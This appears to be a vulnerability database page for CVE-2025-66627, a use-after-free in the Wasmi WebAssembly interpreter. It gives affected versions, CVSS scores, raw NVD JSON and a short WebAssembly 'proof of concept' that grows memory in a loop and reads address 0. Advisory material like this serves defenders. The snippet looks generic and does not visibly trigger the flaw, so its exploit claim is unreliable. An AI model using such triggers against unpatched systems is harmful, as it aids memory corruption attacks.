Security Vulnerability Report
CVE-2025-66627 CVSS 8.4 HIGH

Published: 2025-12-09 16:18:22
Last Modified: 2025-12-10 21:16:04

Description

Wasmi is a WebAssembly interpreter focused on constrained and embedded systems. In versions 0.41.0, 0.41.1, 0.42.0 through 0.47.1, 0.50.0 through 0.51.2 and 1.0.0, Wasmi's linear memory implementation leads to a Use After Free vulnerability, triggered by a WebAssembly module under certain memory growth conditions. This issue potentially leads to memory corruption, information disclosure, or code execution. This issue is fixed in versions 0.41.2, 0.47.1, 0.51.3 and 1.0.1. To work around this issue, consider limiting the maximum linear memory sizes where feasible.

CVSS Details

CVSS Score: 8.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

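cpe:2.3:a:wasmi-labs:wasmi:*:*:*:*:*:rust:*:* (from 0.41.0 inclusive to 0.41.2 exclusive) - VULNERABLE
cpe:2.3:a:wasmi-labs:wasmi:*:*:*:*:*:rust:*:* (from 0.47.0 inclusive to 0.47.1 exclusive) - VULNERABLE
cpe:2.3:a:wasmi-labs:wasmi:*:*:*:*:*:rust:*:* (from 0.51.0 inclusive to 0.51.3 exclusive) - VULNERABLE
cpe:2.3:a:wasmi-labs:wasmi:1.0.0:*:*:*:*:rust:*:* - VULNERABLE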
Wasmi 0.41.0
Wasmi 0.41.1
Wasmi 0.42.0 - 0.47.1
Wasmi 0.50.0 - 0.51.2
Wasmi 1.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
wat
;; CVE-2025-66627 PoC - Wasmi Use After Free via Memory Growth
;; This PoC demonstrates triggering the Use After Free condition
;; through controlled memory growth operations
(module
  (memory 1 256)  ;; Initial memory: 1 page (64KB), max: 256 pages

  ;; Function to trigger memory growth
  (func $trigger_growth (result i32)
    (local $i i32)
    (local.set $i (i32.const 0))

    ;; Loop to grow memory multiple times
    (block $exit
      (loop $loop
        ;; Grow memory by 1 page each iteration
        (drop (memory.grow (i32.const 1)))
        (local.set $i (i32.add (local.get $i) (i32.const 1)))

        ;; Check if we've reached target growth
        (br_if $exit (i32.ge_u (local.get $i) (i32.const 100)))

        ;; Continue looping
        (br $loop)
      )
    )

    ;; Access memory after growth - triggers UAF if vulnerability exists
    (i32.load (i32.const 0))
  )

  ;; Export the trigger function
  (export "trigger_growth" (func $trigger_growth))
)

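References

https://github.com/wasmi-labs/wasmi/security/advisories/GHSA-g4v2-cjqp-rfmq (Patch, Vendor Advisory)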

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66627", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:21.910", "lastModified": "2025-12-10T21:16:04.107", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wasmi is a WebAssembly interpreter focused on constrained and embedded systems. In versions 0.41.0, 0.41.1, 0.42.0 through 0.47.1, 0.50.0 through 0.51.2 and 1.0.0, Wasmi's linear memory implementation leads to a Use After Free vulnerability, triggered by a WebAssembly module under certain memory growth conditions. This issue potentially leads to memory corruption, information disclosure, or code execution. This issue is fixed in versions 0.41.2, 0.47.1, 0.51.3 and 1.0.1. To workaround this issue, consider limiting the maximum linear memory sizes where feasible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:a:wasmi-labs:wasmi:*:*:*:*:*:rust:*:*", "versionStartIncluding": "0.41.0", "versionEndExcluding": "0.41.2", "matchCriteriaId": "DEC38241-42E1-416E-B258-4789ABCE4FAE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wasmi-labs:wasmi:*:*:*:*:*:rust:*:*", "versionStartIncluding": "0.47.0", "versionEndExcluding": "0.47.1", "matchCriteriaId": "1FF46E2B-0D1F-4875-8829-15A4B0F18337"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wasmi-labs:wasmi:*:*:*:*:*:rust:*:*", "versionStartIncluding": "0.51.0", "versionEndExcluding": "0.51.3", "matchCriteriaId": "3DD06F35-DCE6-436A-82E6-8ABFB27F882A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wasmi-labs:wasmi:1.0.0:*:*:*:*:rust:*:*", "matchCriteriaId": "0C5B18F1-7C31-4A15-8A6B-FA4C4F2E8E6B"}]}]}], "references": [{"url": "https://github.com/wasmi-labs/wasmi/security/advisories/GHSA-g4v2-cjqp-rfmq", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}